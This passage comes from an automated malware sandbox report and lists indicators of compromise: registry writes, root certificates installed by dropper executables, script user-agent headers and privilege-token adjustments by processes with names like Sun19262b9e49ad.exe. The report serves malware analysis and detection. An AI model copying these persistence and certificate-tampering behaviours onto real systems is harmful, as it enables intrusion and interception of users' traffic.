Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24}\1 = "5804" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4aa813df69aed701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000050097c45d2c21b3ece630ceee51ffba610135d1f85b55c942f5add0377c80ccf636aea504dc03e506109caf8884ad0306f329d45eb77bd9381b368748cdbdce5d7cf97bb45af21481bddde93f3ee754f89e654aae67a14770f4addab4b38ef5aea5aacc28e2e6bd823fe916f9dab159fec4f486fff5e41e7c63d9d80717d0841702ab87173df97156a8cf758852157d3348e978727c4eded27aec833be4b69b6395f9bb85561473909a75c6d5bf0838a4fc172310a4a6180e5bbead1054301cc371912cfee536a744d6fa6ac33b85eb68509f1c23191811b73869d6398035cebf977d4e9295790d1c00495487819d9904d87aec79f39ab6de62d40ef112d3cd8909b993e130cdf288a86e15251b3902324590e6dfde24b0f41d2fe460e5fcf3f76a4a658d211e61ef5155bfe6e26575ff1a0ef3e9c2c07509793cea9823a48d61fb27dbe5e08ca3be9d1136c94114fbf877c7b3143b8a1100c926e373a5f0205cee494e24490610befdad240a6162283490e86005a24bcab74ee7c2bc36c1e2cc35cc46ec648a14ec950700db8d45174767404de771164f2fcb4a0bf3c31401b1c7ca7803cf70425 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEI2WPE3-XE1H-AE42-701D-DPK87XELRL76}\1 = "2302" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0351fddf69aed701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = eda47e9320aed701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24}\1 = "5640" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64} rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000004d44119add45fe94173d4e9d366309a825cd06b061fbf125a22c36c7de6448943458a5ac26aa43ee4f30f92cdf29753be69944f35c36cf1f389c556583b554936985a8b06ec3df407104b4f71717dbc49a23190aa5fa8444c058 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun19262b9e49ad.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun19262b9e49ad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 92 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 151 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1516 setup_2.exe 1516 setup_2.exe 4644 powershell.exe 4644 powershell.exe 4644 powershell.exe 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 4644 powershell.exe 4644 powershell.exe 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 4900 7574743.scr 4900 7574743.scr 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 2296 Process not Found 4916 WerFault.exe 4916 WerFault.exe 4916 WerFault.exe 4916 WerFault.exe 4916 WerFault.exe 4916 WerFault.exe 4916 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2296 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1516 setup_2.exe 7712 MicrosoftEdgeCP.exe 7712 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 964 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 964 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 964 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 964 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 964 Sun19262b9e49ad.exe Token: SeTcbPrivilege 964 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 964 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 964 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 964 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 964 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 964 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 964 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 964 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 964 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 964 Sun19262b9e49ad.exe Token: SeBackupPrivilege 964 Sun19262b9e49ad.exe Token: SeRestorePrivilege 964 Sun19262b9e49ad.exe Token: SeDebugPrivilege 404 Sun191101c1aaa.exe Token: SeShutdownPrivilege 964 Sun19262b9e49ad.exe Token: SeDebugPrivilege 964 Sun19262b9e49ad.exe Token: SeAuditPrivilege 964 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 964 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 964 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 964 Sun19262b9e49ad.exe Token: SeUndockPrivilege 964 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 964 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 964 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 964 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 964 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 964 Sun19262b9e49ad.exe Token: 31 964 Sun19262b9e49ad.exe Token: 32 964 Sun19262b9e49ad.exe Token: 33 964 Sun19262b9e49ad.exe Token: 34 964 Sun19262b9e49ad.exe Token: 35 964 Sun19262b9e49ad.exe Token: SeDebugPrivilege 1184 Sun19e4ade31b2a.exe Token: SeDebugPrivilege 504 Sun195a1614ec24e6a.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeDebugPrivilege 1836 Sun198361825f4.exe Token: SeDebugPrivilege 4768 2.exe Token: SeDebugPrivilege 4484 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 5100 4111071.scr Token: SeShutdownPrivilege 2296 Process not Found Token: SeCreatePagefilePrivilege 2296 Process not Found Token: SeDebugPrivilege 4392 5.exe Token: SeShutdownPrivilege 2296 Process not Found Token: SeCreatePagefilePrivilege 2296 Process not Found Token: SeShutdownPrivilege 2296 Process not Found Token: SeCreatePagefilePrivilege 2296 Process not Found Token: SeShutdownPrivilege 2296 Process not Found Token: SeCreatePagefilePrivilege 2296 Process not Found Token: SeShutdownPrivilege 2296 Process not Found Token: SeCreatePagefilePrivilege 2296 Process not Found Token: SeRestorePrivilege 4916 WerFault.exe Token: SeBackupPrivilege 4916 WerFault.exe Token: SeDebugPrivilege 4640 5262791.scr Token: SeShutdownPrivilege 2296 Process not Found Token: SeCreatePagefilePrivilege 2296 Process not Found Token: SeShutdownPrivilege 2296 Process not Found Token: 